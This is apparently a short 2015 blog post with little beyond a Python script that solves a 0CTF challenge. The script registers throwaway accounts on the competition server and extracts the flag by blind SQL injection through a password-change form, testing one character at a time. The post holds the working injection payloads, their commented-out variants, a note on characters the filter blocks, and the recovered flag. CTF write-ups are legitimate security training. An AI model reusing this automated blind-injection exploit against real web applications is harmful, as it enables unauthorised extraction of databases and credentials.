03 April 2015

非常不错的爆破脚本

import requests, random, string

# password='=(select  CASE WHEN length(flag)=26 THEN  1 ELSE 1 MATCH '(' END from flag)='
# password='=(select  CASE WHEN substr(flag, 1, 1)='1' THEN  1 ELSE 1 MATCH '(' END from flag)='
# charset = string.digits + "_" + string.letters + "{}"
#0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!"#$%&'()*+,-./:;<=>?@[\]^_`{|}~
# charset = [chr(i) for i in range(256)]
charset = string.printable

#SELECT CASE 3 WHEN 1 THEN 'one' WHEN 2 THEN 'two' ELSE 'more' END;
sql_template = "'=(select  CASE WHEN substr(flag, %d, 1)='%s' THEN  1 ELSE (1 match 1) END from flag)='"
s = requests.Session()

#finally we get the flag = '0CTF{R0t_?_S8rRy_1_doNt_N}'
flag=''

while 1:
	# gen creds
	creds = ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(10))
	
	data = {'username': creds,'password':creds, 'email':creds}
	# register
	r = s.post("http://202.112.28.113:5000/register", data=data)
	if r.text.find("Now You can log in:") == -1:
		continue
		
	# login
	r = s.post("http://202.112.28.113:5000/login", data=data)
	if r.text.find("Modify password") == -1:
		continue
	
	# inject
	i = len(flag) + 1
	print i, 
	for c in charset:
		if c == '-' or c == '/':
			# blacklisted shit !
			continue
		
		data['password'] = sql_template % (i, c)
		r = s.post("http://202.112.28.113:5000/modify", data=data)

		if r.text.find("HAHAHA,YOUR PASSWORD HAS BEEN UPDATED") != -1:
			flag += c
			print repr(flag)
			break


blog comments powered by Disqus